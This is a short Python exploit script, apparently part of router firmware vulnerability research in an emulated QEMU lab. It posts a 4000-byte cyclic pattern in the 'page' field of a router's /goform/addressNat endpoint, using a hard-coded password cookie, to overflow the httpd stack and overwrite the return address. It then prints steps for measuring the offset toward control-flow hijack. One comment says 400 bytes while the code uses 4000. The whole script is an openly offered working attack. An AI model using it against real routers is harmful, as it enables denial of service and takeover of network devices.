import requests
from pwn import *
from requests.exceptions import ConnectionError, ReadTimeout

# 目标路由器配置
IP = "192.168.252.136"
PORT = 80
URL = f"http://{IP}:{PORT}/goform/addressNat"

# 1. 构造致命 Payload
# gotopage 缓冲区分配了 256 字节，前缀 "advance/addressNatList.asp?page=" 占约 32 字节。
# 我们生成 400 字节的专属特征码 (De Bruijn 序列)，足够淹没整个栈并精准覆盖 $ra。
PAYLOAD_LEN = 4000
pattern = cyclic(PAYLOAD_LEN).decode('utf-8')

print(f"[*] 锁定目标接口: {URL}")
print(f"[*] 正在生成 {PAYLOAD_LEN} 字节的探测 Payload...")
print(f"[*] Payload 弹头: {pattern[:40]}...")

# 2. 构造 HTTP 请求
cookies = {
    "password": "recmji"
}

data = {
    # 核心溢出点：注入特征码
    "page": pattern,
    # 附带其它必须参数，防止进入异常分支
    "entrys": "1",
    "mitInterface": "1"
}

try:
    print("\n[*] 发射 Payload！BOOM！")
    # timeout 设为短时间，因为如果触发成功，连接会直接断开或卡死
    res = requests.post(URL, cookies=cookies, data=data, timeout=3)
    
    print(f"[-] 警告: 服务器竟然顶住了？返回状态码: {res.status_code}")
except (ConnectionError, ReadTimeout) as e:
    print("\n[+] 完美命中！HTTP 连接已异常中断。")
    print("="*50)
    print("👉 [战场清理指南]")
    print("1. 目标 httpd 进程大概率已经触发栈溢出。")
    print("2. 留意代码里的 CommitCfm()，如果它卡死了，记得去 QEMU 终端按一下 Ctrl+C 送它上路。")
    print("3. 找到段错误瞬间的 RA/EPC 寄存器值 (例如 0x6161616a)。")
    print("4. 使用 'pwn cyclic -l 0x地址' 计算精确偏移量。")
    print("="*50)
except Exception as e:
    print(f"[-] 发生意料之外的错误: {e}")
